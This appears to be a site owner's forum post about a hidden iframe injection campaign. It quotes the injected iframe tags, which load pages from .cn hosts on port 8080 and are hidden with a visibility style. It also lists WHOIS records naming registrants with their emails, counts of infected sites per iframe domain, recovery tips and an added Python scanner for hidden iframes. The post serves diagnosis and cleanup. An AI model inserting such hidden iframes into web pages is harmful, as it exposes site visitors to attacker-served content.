iframe injection
globalnameshop.cn iframe injection
Some servers are affected by hidden iframe injection. Using iframe injection, the contents of a web page can be altered (added, edited, or deleted) in a line of code.
I've found this code immediately after the opening of the body tag:
1. <iframe src="http://hugetoplocate.cn:8080/index.php" width=153 height=198 style="visibility: hidden"></iframe>
2. <iframe src="http://globalnameshop.cn:8080/index.php" width=129 height=112 style="visibility: hidden"></iframe>
3. <iframe src="http://compoundcapitolgroup.cn:8080/ts/in.cgi?pepsi47" width=125 height=125 style="visibility: hidden"></iframe>
and some others like:
The biggest hint was the names of the two IFRAMEs which were located on the site:
http://dotcomnameshop.cn/in.cgi?income25
and
http://namesupermart.cn/in.cgi?income20
The WHOIS information I got is:
Domain Name: namesupermart.cn
ROID: 20081007s10001s46287853-cn
Domain Status: clientTransferProhibited
Registrant Organization: Scott Bell
Registrant Name: Scott Bell
Administrative Email: scottkbell@missiongossip.com
Sponsoring Registrar: 广东时代互联科技有限公司
Name Server:ns1.freednshostserver.com
Name Server:ns2.freednshostserver.com
Registration Date: 2008-10-07 04:47
Expiration Date: 2009-10-07 04:47

Domain Name: thelotbet.cn
ROID: 20081108s10001s82360691-cn
Domain Status: clientTransferProhibited
Registrant Organization: Raymond Keaton
Registrant Name: Raymond Keaton
Administrative Email: keaton@cybernauttech.com
Name Server:ns1.freednshostway.com
Name Server:ns2.freednshostway.com
Registration Date: 2008-11-08 16:13
Expiration Date: 2009-11-08 16:13
Many of the domains were registered to Raymond Keaton or Scott Bell (above), or to Michelle Rea (rea@cybernauttech.com).
Here are the results, listing each IFRAME domain with its infected domain count:
coolnameshop.cn 935
cutlot.cn 1549
denverfilmdigitalmedia.cn 601
diettopseek.cn 477
dotcomnameshop.cn 399
filmlifemediaguide.cn 0
filmlifemusicsite.cn 38
filmtypemedia.cn 0
findbigname.cn 452
findbigurls.cn 371
homenameregistration.cn 542
hotslotpot.cn 860
internetnamestore.cn 956
liteautotop.cn 965
litecarfinestsite.cn 2324
litecartop.cn 3889
litedownloadseek.cn 805
litegreatestdirect.cn 2664
litepremiumlist.cn 0
litetopfindworld.cn 1375
litetoplocatesite.cn 202
lotante.cn 1699
lotbetworld.cn 741
lotmachinesguide.cn 3654
lotultimatebet.cn 546
mainnameshop.cn 459
mediahomenamemartvideo.cn 240
mediahousenameshopfilm.cn 265
mixante.cn 1050
nameashop.cn 645
namebuyline.cn 310
namebuypicture.cn 2692
namestorefilmlife.cn 351
namesupermart.cn 424
nanotopfind.cn 14
nonfatautobest.cn 271
nonfatcarbest.cn 744
perfectnamestore.cn 662
playbetwager.cn 383
promixgroup.cn 823
superbetfair.cn 3967
superlitecarbest.cn 677
thelotbet.cn 415
yourfilmmovie.cn 0
yourliteseek.cn 59
Recovery:
Here are a few tips that might help you:
1. The first thing is to change the passwords for your FTP, database, and control panel accounts, or remove all saved passwords from your FTP client.
2. Set the file permissions on your server to a secure mode (e.g., restrict any anonymous or Internet user access). You need to contact your hosting company for this task.
3. Download your web files from the server and check them for infections. Clean the infected files. (Contact your programmer/developer for this task.)
4. Scan and clean the PCs/workstations that you use to log in to your web hosting server.
5. Avoid using public/shared computers to access your server.
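For step 3, here is one way to check a downloaded copy of the site for iframes hidden the way the injected ones above are (an added example, not code from the original post). The names scan_html, scan_tree, own_hosts, WEB_EXTENSIONS and the host injected.example are assumptions made for illustration; it only finds literal iframe tags, not ones written out by script.

```python
import os
from html.parser import HTMLParser
from urllib.parse import urlparse

WEB_EXTENSIONS = (".html", ".htm", ".php", ".shtml", ".tpl")  # assumed list
HIDING_STYLES = ("visibility:hidden", "display:none")
# Constructed sample page: one hidden iframe (placeholder host), one normal iframe.
SAMPLE = ('<body>\n<iframe src="http://injected.example:8080/index.php" width=153 '
          'height=198 style="visibility: hidden"></iframe>\n'
          '<iframe src="/map.html" width="400" height="300"></iframe>\n</body>\n')

class HiddenIframeFinder(HTMLParser):
    """Records every <iframe> hidden by inline style or the hidden attribute."""
    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts = {h.lower() for h in own_hosts}
        self.findings = []  # (line number, src, points to a host that is not ours)

    def handle_starttag(self, tag, attrs):
        attr = {name: (value or "") for name, value in attrs}
        style = "".join(attr.get("style", "").lower().split())
        hidden = "hidden" in attr or any(s in style for s in HIDING_STYLES)
        if tag != "iframe" or not hidden:
            return
        src = attr.get("src", "")
        try:
            host = urlparse(src).hostname  # None for relative URLs
        except ValueError:
            host = ""  # malformed URL: report it as external
        external = host is not None and host not in self.own_hosts
        self.findings.append((self.getpos()[0], src, external))

def scan_html(text, own_hosts=()):
    finder = HiddenIframeFinder(own_hosts)
    finder.feed(text)
    finder.close()
    return finder.findings

def scan_tree(root, own_hosts=()):
    """Walk a downloaded copy of the site; return {path: findings} for files with hits."""
    hits = {}
    for folder, _dirs, files in os.walk(root):
        for name in (f for f in files if f.lower().endswith(WEB_EXTENSIONS)):
            path = os.path.join(folder, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = scan_html(fh.read(), own_hosts)
            if found:
                hits[path] = found
    return hits
```

Pass your own domain names in own_hosts so that hidden iframes you placed yourself are reported with the external flag set to False.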
I had saved all of my server passwords in my CuteFTP.
And all of my servers were attacked with this.
I have uploaded all of my index files again using FileZilla.
So far it is OK.
Please let me know if you have additional information about this.













